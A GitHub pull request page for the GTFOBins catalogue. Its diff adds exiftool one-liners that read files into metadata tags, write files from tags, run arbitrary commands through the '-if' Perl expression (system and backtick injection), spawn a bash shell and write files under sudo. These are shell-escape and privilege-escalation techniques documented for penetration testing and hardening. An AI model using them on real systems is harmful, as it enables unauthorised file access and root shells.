Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add more exiftool commands #492

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
24 changes: 24 additions & 0 deletions _gtfobins/exiftool.md
Original file line number Diff line number Diff line change
Expand Up @@ -8,14 +8,38 @@ functions:
OUTPUT=output_file
exiftool -filename=$OUTPUT $LFILE
cat $OUTPUT
- description: Exfiltrate file data via metadata tags
code: |
LFILE=file_read
INPUT=input_file
exiftool "-description<=$LFILE" --filename $INPUT
file-write:
- code: |
LFILE=file_to_write
INPUT=input_file
exiftool -filename=$LFILE $INPUT
- description: Write file from metadata tag's content
code: |
LFILE=file_to_write
INPUT=input_file
exiftool -description -W $LFILE --filename $INPUT
sudo:
- code: |
LFILE=file_to_write
INPUT=input_file
sudo exiftool -filename=$LFILE $INPUT
command:
- code: |
COMMAND=command_to_execute
INPUT=input_file
exiftool -if "system('$COMMAND');1" --filename $INPUT
- description: Run system command and exfiltrate result via metadata tags
code: |
COMMAND=command_to_execute
INPUT=input_file
exiftool -userparam "inj=Test" -if "\$\$self{OPTIONS}{UserParam}{inj}=\`$COMMAND\`;1" '-description<$inj' --filename $INPUT
shell:
- code: |
INPUT=input_file
exiftool -if "system('bash')" $INPUT
---